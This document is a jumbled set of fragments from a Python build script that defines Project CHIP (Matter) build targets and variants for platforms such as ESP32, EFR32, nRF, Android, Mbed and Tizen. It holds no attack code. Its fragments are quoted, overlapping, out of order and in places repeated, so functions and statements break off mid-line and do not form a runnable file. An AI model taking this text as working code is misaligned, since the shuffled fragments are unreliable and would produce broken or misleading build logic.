app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP))", "variants for the given targets. Handles conflict resolution between build", "validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False), builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False), builder.AppendVariant(name=\"no-ble\", enable_ble=False), builder.AppendVariant(name=\"no-wifi\", enable_wifi=False), builder.AppendVariant(name=\"tsan\",", "in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test',", "app_targets = [] for target in targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light',", "def WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant to be", "def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder) yield esp32_target.Extend('m5stack-all-clusters', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS)", "target in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'):", "app=Esp32App.LIGHT) yield devkitc.Extend('lock', app=Esp32App.LOCK) yield devkitc.Extend('bridge', app=Esp32App.BRIDGE) yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT)", "= kwargs def Clone(self): \"\"\"Creates a clone of self.\"\"\" clone", "enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32',", "Unless required by applicable law or agreed to in writing,", "release=True) yield target.Extend('shell-release', app=K32WApp.SHELL, release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield", "yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True) ALL =", "def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield Target('cyw30739-cyw930739m2evb_01-lock', Cyw30739Builder,", "app=Esp32App.ALL_CLUSTERS) yield devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light',", "cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] # Don't cross compile", "the specific language governing permissions and # limitations under the", "MbedBuilder, MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg", "InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ]", "= self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def", "yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool',", "yield target # Without extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL)", "app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TVServer) yield", "MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder", "def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS)", "use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in", "return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name: str): return True", "target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True,", "Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A),", "False return True class VariantBuilder: \"\"\"Handles creating multiple build variants", "use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True).GlobBlacklist(\"Reduce default build", "self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target = self builder.identifier = self.name", "= self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle)", "= Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on", "conflicts variant_target = target.Clone() for option in subgroup: variant_target =", "ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD,", "targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin',", "a \"-\" as separator to the clone name **kargs: arguments", "The number of potential builds is exponential here. builder =", "target.GlobBlacklist('Arm crosscompile does not support libreadline-dev') else: yield target #", "self.variants if v.validator.Accept(target.name)] # Build every possible variant for variant_count", "] builder = VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering',", "plus parameters on how to build it (what builder class", "AmebaApp, AmebaBoard, AmebaBuilder from builders.android import AndroidApp, AndroidBoard, AndroidBuilder from", "board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED)", "@property def GlobBlacklistReason(self): return self.glob_blacklist_reason class AcceptAnyName: def Accept(self, name:", "+ 1): for subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue", "builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board,", "target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend(", "app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build", "variant_target.GlobBlacklist( 'Reduce default build variants') yield variant_target def HostTargets(): target", "target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump',", "this target ok_variants = [ v for v in self.variants", "default build variants') yield variant_target def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(),", "def Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a',", "builders.efr32 import Efr32App, Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board,", "variant \"\"\" clone = self.Clone() clone.name += \"-\" + suffix", "app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER))", "Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\" Yields", "yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True,", "requires: List[str] = [], **buildargs): self.name = name self.validator =", "import K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile", "app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append(", "on a starting target. \"\"\" def __init__(self, targets: List[Target] =", "target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105,", "generator: ALL.append(target) # Simple targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light',", "AllVariants(self): \"\"\" Yields a list of acceptable variants for the", "K32WApp, K32WBuilder from builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile from", "builder = VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target", "import Bl602App, Bl602Board, Bl602Builder from builders.imx import IMXApp, IMXBuilder class", "or (b.name in a.conflicts): return True return False def AllRequirementsMet(items:", "efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4170a', board=Efr32Board.BRD4170A).GlobBlacklist( 'only user requested'),", "default sysroot yield target.GlobBlacklist('Arm crosscompile does not support libreadline-dev') else:", "yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target =", "item.requires: if requirement not in available: return False return True", "= [ v for v in self.variants if v.validator.Accept(target.name)] #", "== 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns',", "enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor', app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder()", "BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self): \"\"\"", "HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] # Don't", "for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH))", "crosscompile does not support libreadline-dev') else: yield target # Without", "bool: for a, b in combinations(items, 2): if (a.name in", "app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc',", "s in self.substr: if s in name: return True return", "**self.create_kw_args) builder.target = self builder.identifier = self.name builder.output_dir = os.path.join(output_prefix,", "typing import List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from", "yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL) yield target.Extend('pump', app=NrfApp.PUMP) yield", "validator self.conflicts = conflicts self.buildargs = buildargs self.requires = requires", "'only user requested') ] builder = VariantBuilder() for board_target in", "cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ] for generator in", "HostTargets(), Esp32Targets(), Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(),", "want a 'build all' to select all variants, so variants", "target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand", "here builder.AppendVariant(name=\"same-event-loop\", validator=AcceptNameWithSubstrings( ['-chip-tool', '-chip-tool-darwin']), separate_event_loop=False), builder.AppendVariant(name=\"no-interactive\", validator=AcceptNameWithSubstrings( ['-chip-tool']), interactive_mode=False),", "# Possible build variants. # NOTE: The number of potential", "targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for", "VariantBuilder() for board_target in board_targets: builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch',", "You may obtain a copy of the License at #", "object extending its build parameters. Arguments: suffix: appended with a", "app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell', app=NrfApp.SHELL)", "# Enable nrf52840dongle for all-clusters and lighting app only yield", "app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend(", "given targets. Handles conflict resolution between build variants and globbing", "True class VariantBuilder: \"\"\"Handles creating multiple build variants based on", "and # limitations under the License. import os from itertools", "builders.qpg import QpgApp, QpgBoard, QpgBuilder from builders.telink import TelinkApp, TelinkBoard,", "IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT)", "yield ameba_target.Extend('amebad-pigweed', board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w', K32WBuilder)", "app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for", "cross compiles # because libreadline is not part of the", "def Extend(self, suffix, **kargs): \"\"\"Creates a clone of the current", "to produce the new build variant \"\"\" clone = self.Clone()", "is satisfied for all items in the given list \"\"\"", "Efr32Targets(), NrfTargets(), AndroidTargets(), MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(),", "target.Extend('lock-ftd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP)", "= rpc.GlobBlacklist( 'Compile failure due to pw_build args not forwarded", "for all items in the given list \"\"\" available =", "yield target.Extend('pump', app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc', app=NrfApp.LIGHT,", "app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER, release=True)", "a name identifier plus parameters on how to build it", "target = Target('imx', IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT)", "enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible build variants.", "QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(), ] for generator in target_generators: for", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder,", "devkitc.Extend('all-clusters-ipv6only', app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield devkitc.Extend('shell', app=Esp32App.SHELL) yield devkitc.Extend('light', app=Esp32App.LIGHT) yield", "target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86,", "target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield target.Extend('all-clusters-app-release', app=IMXApp.ALL_CLUSTERS, release=True) yield target.Extend('ota-provider-app-release', app=IMXApp.OTA_PROVIDER,", "# Copyright (c) 2021 Project CHIP Authors # # Licensed", "target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK),", "builders.mbed import MbedApp, MbedBoard, MbedBuilder, MbedProfile from builders.nrf import NrfApp,", "app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build", "builders.tizen import TizenApp, TizenBoard, TizenBuilder from builders.bl602 import Bl602App, Bl602Board,", "openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller',", "- ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target = Target('infineon', InfineonBuilder) yield", "List[str]): self.substr = substr def Accept(self, name: str): for s", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light', app=NrfApp.LIGHT) yield target.Extend('shell',", "License. # You may obtain a copy of the License", "app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL))", "HasConflicts(items: List[BuildVariant]) -> bool: for a, b in combinations(items, 2):", "are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name) def AppendVariant(self, **args): \"\"\" Add", "str, enable_flashbundle: bool): builder = self.builder_class( repository_path, runner=runner, **self.create_kw_args) builder.target", "yield target def NrfTargets(): target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests',", "select all variants, so variants are generally glob-blacklisted. \"\"\" self.glob_whitelist.append(name)", "exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc')", "board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR).GlobBlacklist( \"Running out of XIP flash space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging',", "[], requires: List[str] = [], **buildargs): self.name = name self.validator", "board=AmebaBoard.AMEBAD, app=AmebaApp.PIGWEED) def K32WTargets(): target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se',", "targets: app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED))", "enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board", "app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE)", "target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield target.Extend('persistent-storage', board=QpgBoard.QPG6105,", "efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist( 'only user requested'),", "target else: builder.targets.append(target) for target in builder.AllVariants(): if cross_compile and", "app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield", "# x64 linux supports cross compile cross_compile = (HostBoard.NATIVE.PlatformName() ==", "import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from", "\", \" clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason = reason return", "rpc.GlobBlacklist( 'Compile failure due to pw_build args not forwarded to", "due to pw_build args not forwarded to proto compiler. '", "app=Esp32App.ALL_CLUSTERS, enable_rpcs=True) yield esp32_target.Extend('m5stack-all-clusters-rpc-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_rpcs=True, enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters',", "# Without extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool',", "app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=True) yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield", "subgroup in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup):", "clone.name += \"-\" + suffix clone.create_kw_args.update(kargs) return clone def Create(self,", "that item.requires is satisfied for all items in the given", "self.Clone() clone.name += \"-\" + suffix clone.create_kw_args.update(kargs) return clone def", "failure due to pw_build args not forwarded to proto compiler.", "'chip-tool' in target.name and 'arm64' in target.name and '-no-interactive' not", "app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP)) app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets:", "builder.AllVariants(): yield target def Bl602Targets(): target = Target('bl602', Bl602Builder) yield", "HostBuilder from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder from builders.k32w import", "return True class VariantBuilder: \"\"\"Handles creating multiple build variants based", "yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield", "yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield", "(HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT))", "app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tool', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('x64-chip-tool', board=AndroidBoard.X64, app=AndroidApp.CHIP_TOOL) yield", "'build all' to select all variants, so variants are generally", "if not AllRequirementsMet(subgroup): continue # Target ready to be created", "app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield", "appended with a \"-\" as separator to the clone name", "def AllVariants(self): \"\"\" Yields a list of acceptable variants for", "efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ] builder = VariantBuilder() for", "target in builder.AllVariants(): yield target def NrfTargets(): target = Target('nrf',", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "AcceptAnyName: def Accept(self, name: str): return True class AcceptNameWithSubstrings: def", "target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html')", "test_target.Extend(board.BoardName() + '-tests', board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target = Target('esp32',", "builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield target def Bl602Targets():", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable", "for the specific language governing permissions and # limitations under", "to select all variants, so variants are generally glob-blacklisted. \"\"\"", "TizenApp, TizenBoard, TizenBuilder from builders.bl602 import Bl602App, Bl602Board, Bl602Builder from", "('-rpc-console' in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner' in", "app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build variants. # NOTE: The", "in builder.AllVariants(): yield target def NrfTargets(): target = Target('nrf', NrfConnectBuilder)", "targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ] # Enable", "build target: Has a name identifier plus parameters on how", "app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible build variants. Note that", "required by applicable law or agreed to in writing, software", "import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard, QpgBuilder", "IMXBuilder class Target: \"\"\"Represents a build target: Has a name", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "= [] # Don't cross compile some builds app_targets.append( target_native.Extend('rpc-console',", "# NOTE: The number of potential builds is exponential here.", "the clone name **kargs: arguments needed to produce the new", "from builders.qpg import QpgApp, QpgBoard, QpgBuilder from builders.telink import TelinkApp,", "demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True, disable_ota=True, release=True) yield target.Extend('shell-release',", "agreed to in writing, software # distributed under the License", "profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield", "app=HostApp.ADDRESS_RESOLVE) yield target_native.Extend('address-resolve-tool-clang', app=HostApp.ADDRESS_RESOLVE, use_clang=True).GlobBlacklist(\"Reduce default build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns',", "app=IMXApp.OTA_PROVIDER, release=True) ALL = [] target_generators = [ HostTargets(), Esp32Targets(),", "distributed under the License is distributed on an \"AS IS\"", "in rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure due to pw_build", "space\") yield Target('cyw30739-cyw930739m2evb_01-ota-requestor-no-progress-logging', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets(): target", "builder def GlobBlacklist(self, reason): clone = self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason", "clone = self.Clone() if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason", "[ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist(", "IMXTargets(): target = Target('imx', IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app',", "conflicts=['asan'], use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\",", "List[str] = [], **buildargs): self.name = name self.validator = validator", "def NrfTargets(): target = Target('nrf', NrfConnectBuilder) yield target.Extend('native-posix-64-tests', board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS)", "to BuildVariant. Example usage: builder.AppendVariant(name=\"ipv6only\", enable_ipv4=False) \"\"\" self.variants.append(BuildVariant(**args)) def AllVariants(self):", "str): return True class AcceptNameWithSubstrings: def __init__(self, substr: List[str]): self.substr", "board=NrfBoard.NATIVE_POSIX_64, app=NrfApp.UNIT_TESTS) targets = [ target.Extend('nrf5340dk', board=NrfBoard.NRF5340DK), target.Extend('nrf52840dk', board=NrfBoard.NRF52840DK), ]", "efr_target.Extend('brd4187a', board=Efr32Board.BRD4187A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested')", "app=HostApp.TV_APP)) app_targets.append( 